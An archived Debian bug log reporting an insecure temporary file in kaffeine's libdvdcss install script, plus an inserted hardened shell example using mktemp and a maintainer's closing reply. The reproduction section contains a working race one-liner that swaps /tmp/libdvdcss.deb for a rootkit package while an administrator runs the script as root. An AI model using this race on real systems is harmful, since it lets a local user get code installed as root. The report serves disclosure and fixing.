Debian Bug report logs - #554772 insecure temporary file /tmp/libdvdcss.deb

Package: kaffeine; Maintainer for kaffeine is Debian KDE Extras Team <>; Source for kaffeine is src:kaffeine.

Reported by: Timo Juhani Lindfors <>

Date: Fri, 6 Nov 2009 12:42:01 UTC

Severity: normal

Tags: security

Found in version kaffeine/0.8.7-1

Fixed in version 1.0-1

Done: Petter Reinholdtsen <>

Bug is archived. No further changes may be made.

Report forwarded to, Debian KDE Extras Team <>:
Bug#554772; Package kaffeine. (Fri, 06 Nov 2009 12:42:04 GMT) Full text and rfc822 format available.

Acknowledgement sent to Timo Juhani Lindfors <>:
New Bug report received and forwarded. Copy sent to Debian KDE Extras Team <>. (Fri, 06 Nov 2009 12:42:04 GMT) Full text and rfc822 format available.

Message #5 received at (full text, mbox):

From: Timo Juhani Lindfors <>
To: Debian Bug Tracking System <>
Subject: insecure temporary file /tmp/libdvdcss.deb
Date: Fri, 06 Nov 2009 14:09:54 +0200
Package: kaffeine
Version: 0.8.7-1
Severity: normal
Tags: security

Steps to reproduce:
1) Malice starts the following command in the background with the
   privileges of her normal user account:

sh -c 'echo > /tmp/libdvdcss.deb; inotifywait /tmp/libdvdcss.deb; rm /tmp/libdvdcss.deb; mv /tmp/rootkit.deb /tmp/libdvdcss.deb' &

2) Malice calls the local administrator Trent and complains that she
   can't watch DVDs.

3) Guided by /usr/share/doc/kaffeine/README.Debian Trent runs

sudo bash /usr/share/doc/kaffeine/

Expected results:
3) Code to decrypt DVDs is installed.

Actual results:
3) Due to insecure use of temporary files in Malice's
   rootkit.deb is installed:

$ sudo bash /usr/share/doc/kaffeine/
--2009-11-06 13:54:46--
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 26176 (26K) [text/plain]
Saving to: `/tmp/libdvdcss.deb'

100%[=====================================>] 26,176      --.-K/s   in 0.03s

2009-11-06 13:54:47 (799 KB/s) - `/tmp/libdvdcss.deb' saved [26176/26176]

(Reading database ... 176859 files and directories currently installed.)
Unpacking replacement rootkit ...
Setting up rootkit (0.1-1) ...
Processing triggers for man-db ...

-- System Information:
Debian Release: 5.0.3
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.26-2-xen-amd64 (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=fi_FI (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages kaffeine depends on:
ii  hdparm           8.9-3                   tune hard disk parameters for high
ii  kdelibs4c2a      4:3.5.10.dfsg.1-0lenny2 core libraries and binaries for al
ii  libc6            2.7-18                  GNU C Library: Shared libraries
ii  libcdparanoia0   3.10.2+debian-5         audio extraction tool for sampling
ii  libgcc1          1:4.3.2-1.1             GCC support library
ii  libogg0          1.1.3-4                 Ogg Bitstream Library
ii  libqt3-mt        3:3.3.8b-5              Qt GUI Library (Threaded runtime v
ii  libstdc++6       4.3.2-1.1               The GNU Standard C++ Library v3
ii  libvorbis0a      1.2.0.dfsg-3.1          The Vorbis General Audio Compressi
ii  libvorbisenc2    1.2.0.dfsg-3.1          The Vorbis General Audio Compressi
ii  libx11-6         2:1.1.5-2               X11 client-side library
ii  libxcb1          1.1-1.2                 X C Binding
ii  libxext6         2:1.0.4-1               X11 miscellaneous extension librar
ii  libxine1         1.1.14-6                the xine video/media player librar
ii  libxine1-ffmpeg  1.1.14-6                MPEG-related plugins for libxine1
ii  libxine1-x       1.1.14-6                X desktop video output plugins for
ii  libxinerama1     2:1.0.3-2               X11 Xinerama extension library
ii  libxtst6         2:1.0.3-1               X11 Testing -- Resource extension 

kaffeine recommends no packages.

kaffeine suggests no packages.

-- no debconf information
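The race in the report exists because a root-run script writes to a fixed, predictable path (/tmp/libdvdcss.deb) in a world-writable directory, so any local user can pre-create or swap the file. The following is an added example, not code from the bug report or from the kaffeine package, of the hardened pattern: download into a private directory from mktemp -d and check the result before handing it to the installer. The helper names fetch_deb and safe_install, and the file:// branch used for offline demonstration, are assumptions.

```shell
#!/bin/sh
# Hardened replacement for "download to /tmp/libdvdcss.deb, then dpkg -i".
# Assumption: the original script used a fixed path under /tmp; here every run
# gets its own mode-0700 directory that other users cannot write into.
set -eu

# fetch_deb URL DEST: download helper. Real use: wget. A file:// URL is copied
# instead so the example runs offline (constructed input, not a real mirror).
fetch_deb() {
    case "$1" in
        file://*) cp -- "${1#file://}" "$2" ;;
        *) wget -q -O "$2" "$1" ;;
    esac
}

# safe_install URL INSTALLER: fetch into a private directory, verify, install.
# INSTALLER is the command run on the downloaded file (in real use: "dpkg -i").
# Sets LAST_DEB to the path that was handed to the installer.
safe_install() {
    url=$1; installer=$2
    # mktemp -d creates a fresh, unpredictable, owner-only directory, so nobody
    # can plant /tmp/libdvdcss.deb ahead of time or replace it mid-run.
    workdir=$(mktemp -d) || return 1
    deb="$workdir/libdvdcss.deb"
    if ! fetch_deb "$url" "$deb"; then
        rm -rf -- "$workdir"; return 1
    fi
    # Refuse anything that is not a plain regular file (e.g. a symlink).
    if [ ! -f "$deb" ] || [ -L "$deb" ]; then
        echo "refusing to install $deb: not a regular file" >&2
        rm -rf -- "$workdir"; return 1
    fi
    LAST_DEB=$deb
    status=0
    $installer "$deb" || status=$?
    rm -rf -- "$workdir"      # nothing is left behind for another user to find
    return "$status"
}

# Stand-in installer for the demo: records what would have been installed.
record_install() { INSTALLED=$1; INSTALLED_OK=1; }
```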

Reply sent to Petter Reinholdtsen <>:
You have taken responsibility. (Mon, 09 Aug 2010 13:33:05 GMT) Full text and rfc822 format available.

Notification sent to Timo Juhani Lindfors <>:
Bug acknowledged by developer. (Mon, 09 Aug 2010 13:33:05 GMT) Full text and rfc822 format available.

Message #10 received at (full text, mbox):

From: Petter Reinholdtsen <>
Subject: Re: insecure temporary file /tmp/libdvdcss.deb
Date: Mon, 09 Aug 2010 15:30:48 +0200
Version: 1.0-1

I had a look in version 1.0-1 in testing, and the
/usr/share/doc/kaffeine/ no longer exists in the package.
Because of this, I believe this bug can be closed.

I did not find anything about its removal in the Debian changelog, so I
do not know in which version it was taken away.

Happy hacking,
Petter Reinholdtsen

Bug archived. Request was from Debbugs Internal Request <> to (Tue, 07 Sep 2010 07:35:37 GMT) Full text and rfc822 format available.

Debian bug tracking system administrator <>. Last modified: Fri Apr 18 10:37:33 2014; Machine Name: